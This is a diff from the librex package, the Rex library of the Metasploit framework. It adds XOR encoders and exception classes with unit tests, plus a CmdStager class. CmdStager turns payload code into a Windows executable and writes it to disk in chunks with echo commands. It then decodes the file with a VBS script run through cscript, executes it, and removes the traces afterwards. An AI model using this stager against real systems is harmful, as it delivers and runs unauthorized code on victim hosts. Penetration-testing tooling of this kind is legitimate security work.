librex 0.0.1

data/lib/rex/encoding/xor/qword.rb

@@ -0,0 +1,15 @@
+#!/usr/bin/env ruby
+
+require 'rex/encoding/xor/generic'
+
+module Rex
+module Encoding
+module Xor
+
+class Qword < Generic
+
+	def Qword.keysize
+		8
+	end
+
+end end end end

data/lib/rex/encoding/xor/word.rb

@@ -0,0 +1,21 @@
+#!/usr/bin/env ruby
+
+require 'rex/encoding/xor/generic'
+
+#
+# Routine for xor encoding a buffer by a 2-byte (intel word) key.  The perl
+# version used to pad this buffer out to a 2-byte boundary, but I can't think
+# of a good reason to do that anymore, so this doesn't.
+#
+
+module Rex
+module Encoding
+module Xor
+
+class Word < Generic
+
+	def Word.keysize
+		2
+	end
+
+end end end end # Word/Xor/Encoding/Rex

data/lib/rex/encoding/xor/word.rb.ut.rb

@@ -0,0 +1,13 @@
+#!/usr/bin/env ruby
+
+$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
+
+require 'rex/encoding/xor/word'
+require 'rex/encoding/xor/byte.rb.ut'
+
+class Rex::Encoding::Xor::Word::UnitTest < Rex::Encoding::Xor::Byte::UnitTest
+
+	def enc
+		Rex::Encoding::Xor::Word
+	end
+end

data/lib/rex/exceptions.rb

@@ -0,0 +1,275 @@
+#!/usr/bin/env ruby
+
+module Rex
+
+###
+#
+# Base mixin for all exceptions that can be thrown from inside Rex.
+#
+###
+module Exception
+end
+
+###
+#
+# This exception is raised when a timeout occurs.
+#
+###
+class TimeoutError < Interrupt
+	include Exception
+
+	def to_s
+		"Operation timed out."
+	end
+end
+
+###
+#
+# This exception is raised when a method is called or a feature is used that
+# is not implemented.
+#
+###
+class NotImplementedError < ::NotImplementedError
+	include Exception
+
+	def to_s
+		"The requested method is not implemented."
+	end
+end
+
+###
+#
+# This exception is raised when a generalized runtime error occurs.
+#
+###
+class RuntimeError < ::RuntimeError
+	include Exception
+end
+
+###
+#
+# This exception is raised when an invalid argument is supplied to a method.
+#
+###
+class ArgumentError < ::ArgumentError
+	include Exception
+
+	def initialize(message = nil)
+		@message = message
+	end
+
+	def to_s
+		str = 'An invalid argument was specified.'
+		if @message
+			str += " #{@message}"
+		end
+		str
+	end
+end
+
+###
+#
+# This exception is raised when an argument that was supplied to a method
+# could not be parsed correctly.
+#
+###
+class ArgumentParseError < ::ArgumentError
+	include Exception
+
+	def to_s
+		"The argument could not be parsed correctly."
+	end
+end
+
+###
+#
+# This exception is raised when an argument is ambiguous.
+#
+###
+class AmbiguousArgumentError < ::RuntimeError
+	include Exception
+
+	def initialize(name = nil)
+		@name = name
+	end
+
+	def to_s
+		"The name #{@name} is ambiguous."
+	end
+end
+
+###
+#
+# This error is thrown when a stream is detected as being closed.
+#
+###
+class StreamClosedError < ::IOError
+	include Exception
+
+	def initialize(stream)
+		@stream = stream
+	end
+
+	def stream
+		@stream
+	end
+
+	def to_s
+		"Stream #{@stream} is closed."
+	end
+end
+
+##
+#
+# Socket exceptions
+#
+##
+
+###
+#
+# This exception is raised when a general socket error occurs.
+#
+###
+module SocketError
+	include Exception
+
+	def to_s
+		"A socket error occurred."
+	end
+end
+
+###
+#
+# This exception is raised when there is some kind of error related to
+# communication with a host.
+#
+###
+module HostCommunicationError
+	def initialize(addr = nil, port = nil)
+		self.host = addr
+		self.port = port
+	end
+
+	#
+	# This method returns a printable address and optional port associated
+	# with the host that triggered the exception.
+	#
+	def addr_to_s
+		if host and port
+			"(#{host}:#{port})"
+		elsif host
+			"(#{host})"
+		else
+			""
+		end
+	end
+
+	attr_accessor :host, :port
+end
+
+
+###
+#
+# This exception is raised when a connection attempt fails because the remote
+# side refused the connection.
+#
+###
+
+class ConnectionError < ::IOError
+	include SocketError
+	include HostCommunicationError
+end
+
+###
+#
+# This exception is raised when a connection attempt fails because the remote
+# side refused the connection.
+#
+###
+class ConnectionRefused < ConnectionError
+	def to_s
+		"The connection was refused by the remote host #{addr_to_s}."
+	end
+end
+
+###
+#
+# This exception is raised when a connection attempt fails because the remote
+# side is unreachable.
+#
+###
+class HostUnreachable < ConnectionError
+	def to_s
+		"The host #{addr_to_s} was unreachable."
+	end
+end
+
+###
+#
+# This exception is raised when a connection attempt times out.
+#
+###
+class ConnectionTimeout < ConnectionError
+	def to_s
+		"The connection timed out #{addr_to_s}."
+	end
+end
+
+
+###
+#
+# This exception is raised when an attempt to use an address or port that is
+# already in use occurs, such as binding to a host on a given port that is
+# already in use.
+#
+###
+class AddressInUse < ::RuntimeError
+	include SocketError
+	include HostCommunicationError
+
+	def to_s
+		"The address is already in use #{addr_to_s}."
+	end
+end
+
+###
+#
+# This exception is raised when an unsupported internet protocol is specified.
+#
+###
+class UnsupportedProtocol < ::ArgumentError
+	include SocketError
+
+	def initialize(proto = nil)
+		self.proto = proto
+	end
+
+	def to_s
+		"The protocol #{proto} is not supported."
+	end
+
+	attr_accessor :proto
+end
+
+
+###
+#
+# This exception is raised when a proxy fails to pass a connection
+#
+###
+class ConnectionProxyError < ConnectionError
+	def initialize(host,port,ptype,reason)
+		super(host,port)
+		self.ptype = ptype
+		self.reason = reason
+	end
+
+	def to_s
+		self.ptype + ": " + self.reason
+	end
+
+	attr_accessor :ptype, :reason
+end
+
+end
+

data/lib/rex/exceptions.rb.ut.rb

@@ -0,0 +1,44 @@
+#!/usr/bin/env ruby
+
+$:.unshift(File.join(File.dirname(__FILE__), '..'))
+
+require 'test/unit'
+require 'rex/exceptions'
+
+module Rex
+module Exceptions
+
+class UnitTest < Test::Unit::TestCase
+
+	def test_exceptions
+		Rex.constants.each { |const|
+			mod = Rex.const_get(const)
+
+			if ((mod.kind_of?(Class) == false) ||
+			    (mod.ancestors.include?(Rex::Exception) == false))
+				next
+			end
+
+			begin
+				raise mod.new
+			rescue ::ArgumentError
+			rescue mod => detail
+				assert_respond_to(detail, 'to_s', "#{mod} does not implement to_s")
+				assert_not_nil(detail.to_s, "invalid to_s")
+			end
+		}
+
+		# Test communication error detail strings
+		begin
+			raise ConnectionRefused.new('127.0.0.1', 4444)
+		rescue HostCommunicationError => detail
+			assert_match(/^The connection(.*)\(127.0.0.1:4444\)/, detail.to_s)
+			assert_equal('127.0.0.1', detail.host)
+			assert_equal(4444, detail.port)
+		end
+	end
+
+end
+
+end
+end

data/lib/rex/exploitation/cmdstager.rb

@@ -0,0 +1,133 @@
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides an interface to generating cmdstagers.
+#
+###
+
+class CmdStager
+
+	def initialize(code, framework, platform, arch = nil)
+		@var_decoder = Rex::Text.rand_text_alpha(5)
+		@var_encoded = Rex::Text.rand_text_alpha(5)
+		@var_batch   = Rex::Text.rand_text_alpha(5)
+		@decoder	    =	File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "decoder_stub") # need error checking here
+		@framework   =	framework
+		@linelen     = 2047 # covers most likely cases
+
+		# XXX: TODO: support multipl architectures/platforms
+		@exe	       = Msf::Util::EXE.to_win32pe(@framework, code)
+	end
+
+
+	#
+	# Generates the cmd payload including the h2bv2 decoder and encoded payload.
+	# The resulting commands also perform cleanup, removing any left over files
+	#
+	def generate(opts = {}, linelen = 200)
+		@linelen = linelen
+
+		# Return the output from payload_exe
+		payload_exe(opts)
+	end
+
+
+	#
+	# This does the work of actually building an array of commands that
+	# when executed will create and run an executable payload.
+	#
+	def payload_exe(opts)
+
+		persist = opts[:persist]
+
+		# Initialize an arry of commands to execute
+		cmds = []
+
+		# Add the exe building commands (write to .b64)
+		cmds += encode_payload()
+
+		# Add the decoder script building commands
+		cmds += generate_decoder()
+
+		# Make it all happen
+		cmds << "cscript //nologo %TEMP%\\#{@var_decoder}.vbs"
+
+		# If we're not persisting, clean up afterwards
+		if (not persist)
+			cmds << "del %TEMP%\\#{@var_decoder}.vbs"
+			cmds << "del %TEMP%\\#{@var_encoded}.b64"
+		end
+
+		# Compress commands into as few lines as possible.
+		new_cmds = []
+		line = ''
+		cmds.each { |cmd|
+			# If this command will fit...
+			if ((line.length + cmd.length + 4) < @linelen)
+				line << " & " if line.length > 0
+				line << cmd
+			else
+				# It won't fit.. If we don't have something error out
+				if (line.length < 1)
+					raise RuntimeError, 'Line fit problem -- file a bug'
+				end
+				# If it won't fit even after emptying the current line, error out..
+				if (cmd.length > @linelen)
+					raise RuntimeError, 'Line too long - %d bytes' % cmd.length
+				end
+				new_cmds << line
+				line = ''
+				line << cmd
+			end
+		}
+		new_cmds << line if (line.length > 0)
+
+		# Return the final array.
+		new_cmds
+	end
+
+
+	def generate_decoder()
+		# Read the decoder data file
+		f = File.new(@decoder, "rb")
+		decoder = f.read(f.stat.size)
+		f.close
+
+		# Replace variables
+		decoder.gsub!(/decode_stub/, "%TEMP%\\#{@var_decoder}.vbs")
+		decoder.gsub!(/ENCODED/, "%TEMP%\\#{@var_encoded}.b64")
+		decoder.gsub!(/DECODED/, "%TEMP%\\#{@var_batch}.exe")
+
+		# Split it apart by the lines
+		decoder.split("\n")
+	end
+
+
+	def encode_payload()
+		tmp = Rex::Text.encode_base64(@exe)
+		orig = tmp.dup
+
+		cmds = []
+		l_start = "echo "
+		l_end   = ">>%TEMP%\\#{@var_encoded}.b64"
+		xtra_len = l_start.length + @var_encoded.length + l_end.length + 1
+		while (tmp.length > 0)
+			cmd = ''
+			cmd << l_start
+			cmd << tmp.slice!(0, (@linelen - xtra_len))
+			cmd << l_end
+			cmds << cmd
+		end
+
+		cmds
+	end
+
+end
+end
+end